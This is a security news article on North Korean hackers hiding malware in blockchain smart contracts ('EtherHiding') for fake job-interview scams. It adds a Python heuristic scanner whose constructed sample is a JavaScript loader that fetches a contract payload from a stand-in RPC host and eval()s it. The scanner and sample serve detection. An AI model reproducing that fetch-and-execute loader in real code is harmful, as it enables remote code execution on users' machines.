North Korean hackers have started using a new method called EtherHiding to hide and deliver malware through blockchain smart contracts.
This technique is being used in fake job interview scams to steal cryptocurrency and personal data from unsuspecting victims.
According to Google’s Threat Intelligence Group, a North Korean state-sponsored group known as UNC5342 has been using EtherHiding since February in operations they call “Contagious Interview.” Researchers say this is the first time they have seen a government-backed hacking group use this kind of blockchain-based attack.
EtherHiding was first documented by Guardio Labs in 2023. It works by embedding malicious code inside smart contracts on public blockchains such as Binance Smart Chain or Ethereum. A smart contract can store a hidden malware script that the attackers can retrieve at any time. Because public blockchains are decentralised and their contents cannot be removed, the technique gives attackers a high degree of anonymity, makes takedowns extremely difficult, and lets them update their malicious code cheaply and easily. Since the payloads are retrieved with read-only blockchain calls, no transaction is recorded on-chain, which makes detection even harder.
In these attacks, hackers typically pose as recruiters from fake companies such as BlockNovas LLC, Angeloper Agency, or SoftGlide LLC. They target software and web developers with fake job opportunities and trick them into downloading or running code as part of a so-called technical interview. This code is actually a downloader that connects to the blockchain to fetch the real malware.
Google’s researchers explain that the smart contract hosts a downloader known as JADESNOW, which interacts with the Ethereum blockchain to pull a second-stage payload. This payload is a JavaScript version of a spyware tool called InvisibleFerret, which is used for long-term spying on infected devices. The malware runs silently in memory and can even request additional components designed to steal login credentials, passwords, and cryptocurrency wallet information.
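As an added example (not code from the article or from Google's report), the following heuristic scanner looks for the retrieval pattern described above: a script that reads a string out of a smart contract with a read-only call, decodes the returned hex, and hands it to a code-execution sink. The RPC hostnames and both JavaScript samples are constructed illustrations, not indicators from the campaign.

```python
import re

# Heuristic indicators of the EtherHiding loader pattern: a script that
# (1) issues a read-only contract call over JSON-RPC, (2) decodes the
# returned hex into text and (3) hands that text to a code-execution sink.
INDICATORS = {
    "read_only_contract_call": re.compile(
        r"""["']?method["']?\s*:\s*["']eth_call["']|eth_call\s*\(|\.call\s*\(\s*\)""", re.I),
    # Well-known public RPC provider hosts (illustrative, not an exhaustive list).
    "public_rpc_endpoint": re.compile(
        r"https?://[^\s'\"]*(bsc-dataseed|infura\.io|alchemy\.com|ankr\.com)", re.I),
    "hex_payload_decoding": re.compile(
        r"hexToAscii|hexToUtf8|decodeParameter|fromHex|parseInt\([^)]*,\s*16\)", re.I),
    "dynamic_code_execution": re.compile(
        r"""\beval\s*\(|new\s+Function\s*\(|document\.write\s*\(|createElement\s*\(\s*["']script["']""", re.I),
}

def scan_script(js_source: str) -> dict:
    """Return the matched indicator names and a verdict for one JavaScript source."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(js_source)]
    executes = "dynamic_code_execution" in hits
    # Reading contract state is normal dApp behaviour; the combination of a
    # contract read with a code-execution sink is what marks the pattern.
    if executes and "read_only_contract_call" in hits:
        verdict = "suspicious"
    elif executes and len(hits) > 1:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": hits}

# Constructed samples (not real attacker code): a benign balance reader and a
# loader that pulls a string out of a contract, decodes it and runs it.
BENIGN_JS = """
const web3 = new Web3("https://mainnet.infura.io/v3/EXAMPLE_KEY");
web3.eth.getBalance(addr).then(b => console.log(b));
"""
SUSPICIOUS_JS = """
fetch("https://bsc-dataseed.example/", {method: "POST",
  body: JSON.stringify({jsonrpc: "2.0", id: 1, method: "eth_call",
    params: [{to: CONTRACT_ADDR, data: SELECTOR}, "latest"]})})
  .then(r => r.json())
  .then(j => eval(web3.utils.hexToAscii(j.result)));
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_JS), ("suspicious", SUSPICIOUS_JS)):
        print(label, scan_script(src))
```

Run over the JavaScript files a web proxy or endpoint agent captures, a "suspicious" verdict is a prompt for analyst review of the script, not a confirmed detection.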
The hackers use both the Ethereum and Binance Smart Chain networks to host their malicious data, which makes their operations more complex and harder to trace. Google found that the attackers updated their malicious smart contract more than 20 times within the first four months of the campaign, spending about $1.37 per update in gas fees. This shows how inexpensive and flexible this attack method is for cybercriminals.
Once the malware infects a device, it quietly waits for commands from its control server. It can execute commands, steal files, and send stolen data to external servers or even through Telegram. The credential-stealing part of the malware targets information stored in web browsers such as Chrome and Edge, including passwords, credit card data, and crypto wallet details from extensions like MetaMask and Phantom.
The use of EtherHiding by North Korean hackers is a worrying trend that makes it harder for security experts to track or shut down their campaigns. People should be extremely cautious when receiving job offers online, especially those that ask them to download files or run code. It’s always best to test such files in a secure, isolated environment before opening them.
Google recommends that system administrators restrict downloads of risky file types such as EXE, MSI, BAT, and DLL on corporate networks, enforce strict browser policies, and manage all web access and script permissions carefully to reduce exposure to such attacks.